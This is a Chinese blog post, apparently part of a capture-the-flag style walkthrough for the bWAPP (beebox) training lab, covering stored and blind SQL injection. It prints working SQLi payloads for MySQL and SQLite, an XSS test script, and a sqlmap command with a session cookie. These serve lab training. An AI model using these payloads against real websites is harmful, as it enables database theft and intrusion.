beebox靶场A1 low 命令注入通关教程(下)

最新推荐文章于 2024-07-20 20:04:43 发布
最新推荐文章于 2024-07-20 20:04:43 发布
阅读量961 收藏 24
点赞数 22
文章标签: 数据库 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dj445566/article/details/135035707
版权

十八:SQL Injection - Stored (Blog)

其实大部分sql注入都是为了构造闭合,查看源码为

$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";

根据闭合构建爆库payload为 1', (select database()))#

爆表的payload为 1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#

爆字段为 1',(extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))))#

爆数据为 1',(extractvalue(1,concat(0x7e,(select database()),0x7e))))#

这个存储型的页面显然还能插入xss脚本

<script>alert(77777)</script>

十九:SQL 注入 存储型 SQLite

查看源码为

$sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" . ++$id . ",'" . date('Y-md', time()) . "','" . $entry . "','" . $owner . "');";

构造闭合为 ',''); 这个会生成一条空记录

',sqlite_version()); 会显示版本
报表语句为 ',(select name from sqlite_master where type='table'));

二十:SQL 注入 存储 (User-Agent)

刷新页面既是一次insert操作,写入内容是请求头 UserAgent

源码为

$sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";

根据源码构造闭合为 1',(select database()))#

二十一:SQL 注入 盲注 - Boolean-Based

sql盲注太浪费时间,直接用自动化工具进行sqlmap的注入

注入的payload为:

sqlmap -u "http://192.168.150.128/bWAPP/sqli_4.php?title=1&action=search" --cookie="security_level=0; PHPSESSID=f5390b8d9d77525806c6938105bbda2c; has_js=1" --dbs

最后跑出来的数据库

跑出的表为

二十二:SQL 注入 - 盲 - 基于时间

管他三七二十一,直接sqlmap一把梭

爆的库为

爆的表为

二十三:SQL 注入 - 盲 (SQLite)

正常简单测试,输入1,会显示电影不存在,但当我们输入1 ' 时就会显示语法不正确,证明判断了sql语句,那么这个1 ' 可是是一个注入点 ,接下来我们测试 1' order by 6--+

这时页面仍照常回显,当order by 到7 时报错,证明改库有6列

接下来如果想爆库的话可以使用以下步骤

步骤1:判断数据库的长度。 在输入框中依次输入 lucy' and length(database())=x #(x为大于等于1的整数) 当显示存在时即为数据库长度 发现当x=7时显示存在,故数据库长度为7 步骤2:二分法查找数据库名 依次输入 lucy' and ascii(substr(databse(),1,1))>或<字符的ascii 值#, 通过比较输入字符的ascii值的显示正常与否来 逐个确定库名。 备注:substr(databse(),1,1)表示数据库名的第一个 字符, substr(databse(),2,1)表示数据库名的第二个字符, 依次类推 重复上述步骤,就可以得到完整的数据库名 pikachu。

dj445566
关注
  • 22
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cloudbeebox:Trello PowerUp提供Cloud Beebox支持
03-17
要深入了解Cloud Beebox的具体功能和使用方法,我们需要查看其源代码或寻找相关的文档和教程。这将有助于我们掌握如何安装、配置和利用这个Power-Up来提升Trello的项目管理体验。如果Cloud Beebox提供了公开的API或...
Beebox for Java-开源
05-03
【标题】"Beebox for Java-开源"指的是一个基于Java平台的开源开发工具包,主要命名为"BeeBox"。这个工具包旨在为Java开发者提供一套便捷的框架,以简化和优化开发流程。 【描述】中提到,"该软件包是Java的开发...
beebox靶场A1 low 命令注入通关教程(上)
dj445566的博客
12-14 1576
本文为beebox(小蜜蜂)靶场系列A1low级别的命令注入和各种注入的集合,大家多多掌握方法和思路
beebox靶场A1 low 命令注入通关教程(中)
dj445566的博客
12-15 939
本文为beebox(小蜜蜂)系列靶场A1命令注入,大家多注意思路
beebox靶场A3 low级别 xss通关教程(三)
dj445566的博客
12-11 693
本文为beebox(小蜜蜂)系列靶场,大家多理解xss注入的思路以及方法,为日后渗透时注入xss打下基础
beebox靶场A3 low级别 xss通关教程(二)
dj445566的博客
12-10 697
本文为beebox(小蜜蜂)系列靶场中的xss关卡,大家熟练掌握xss的注入方式和思路,有什么不懂的地方可以评论或私信交流
beebox_detect_wang_cam_tset(实验).py
04-23
beebox_detect_wang_cam_tset(实验).py
DVWA、MCIR、pikachu、Mutillidae、BWAPP靶机安装包
03-24
它包含了一系列常见的安全漏洞,如SQL注入、XSS跨站脚本、文件包含、命令注入等。通过DVWA,用户可以了解并练习如何利用这些漏洞,从而提升对Web应用安全的理解。 2. MCIR(Modular Cybersecurity Incident ...
OAuth2.0 or Spring Session or 单点登录流程
最新发布
qq_53374893的博客
07-20 243
一句话精辟解释: 在过滤器放行的时候,偷偷的把原生的 request 和 response 对象换成了它的实现,也就是 调用getSession 的时候拿到的 其实是对redis 操作的Session。但其他的操作还是使用原生的,只不过重写的方法,调用的是子类的,也就是往 redis 里放入 Session,把原生的操作给替换了!分布式Session原理,使用子域名,的时候放入父域名的 JsessionId 然后将这个ID 的所存的内容放入Redis ,这样实现不同域名共享同一sessionID.
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 565
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
Spring框架之DI依赖注入
G81948577的博客
07-18 971
我们在下面构建spring的过程中体会依赖注入;从上面的图中我们知道,在ssm框架中服务层(server)无法直接操作数据库,持久层(dao)是直接操作数据库进行数据处理的,但是我们如果在服务层有一个持久层的对象,然后我们在服务层通过对象去调用持久层的方法就可以操作数据库了。@OverrideSystem.out.println("持久层,你好");UserServiceImpl类中的代码如下@Override。
深入 Dify 源码,洞察 Dify RAG 核心机制
易迟的专栏
07-17 1130
之前深入源码对 Dify 的完整流程进行了解读,基本上梳理了 Dify 的实现流程与主要组件。但是在实际部署之后,发现 Dify 现有的 RAG 检索效果没有那么理想。因此个人结合前端页面,配置信息与实现流程,深入查看了私有化部署的 Dify 的技术细节。将核心内容整理在这边,方便大家根据实际的业务场景调整 Dify 知识库的配置,或者根据需要进行二次开发调优。
Apache AGE的WITH子句
oscube的博客
07-17 305
使用 WITH,您可以在将输出传递给以下查询部分之前对其进行操作。这些操作可以是结果集中条目的形状和/或数量。WITH 也可以像 RETURN 一样,使用别名对引入结果的表达式进行别名,使用别名作为绑定名称。WITH 还用于将图的读取与图的更新分开。查询的每个部分必须是只读的或只写的。从写入子句转到读取子句时,可以使用可选的 WITH 进行此操作。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 902
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
Java并发编程与高并发解决方案笔记
tuku0801的专栏
07-17 1015
将结合大量图示及代码演示,带你掌握多线程并发编程(线程安全,线程调度,线程封闭,同步容器等)与高并发处理思路与手段(扩容,缓存,队列,拆分等),构建完整的并发与高并发知识体系
云计算数据中心(三)
Morse_Chen的博客
07-18 1209
本文讲解云计算数据中心,介绍云数据中心的自动化管理和容灾备份。
linux系统 mysql-8.0.32安装
w20228396的博客
07-16 382
检查系统是否安装了mariadb数据库, mariadb数据库是mysql的分支,是免费开源的。初始化数据库,安装加密算法(初始化时候,密码将在log-error=/data/mysql-8.0.32/error.log中产生)若linux中安装了mariadb数据库,先卸载掉, mariadb数据库可能与安装mysql发生冲突。再去bin目录下,执行 mysqld_safe --skip-grant-tables &然后mysql -uroot -p登陆,直接回车,不需要密码可登陆进去。
oracle 经营范围 设计
男神的专栏
07-17 278
在Oracle数据库中设计经营范围通常涉及创建相关的数据库表来记录和管理经营范围内的数据。这个设计可以扩展为包括更多的字段,比如地址、联系方式、状态等,以满足具体业务需求。表用来记录每个经营单位的信息,包括单位ID、单位名称和父单位ID。字段关联,以确保所有父单位ID都存在于该表中。
mysql的索引、事务和存储引擎
Hai990218的博客
07-17 1218
索引是一个排序的列表,在列表当中存储索引的值以及索引值对应数据所在的物理行。索引值和数据是一个映射关系。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值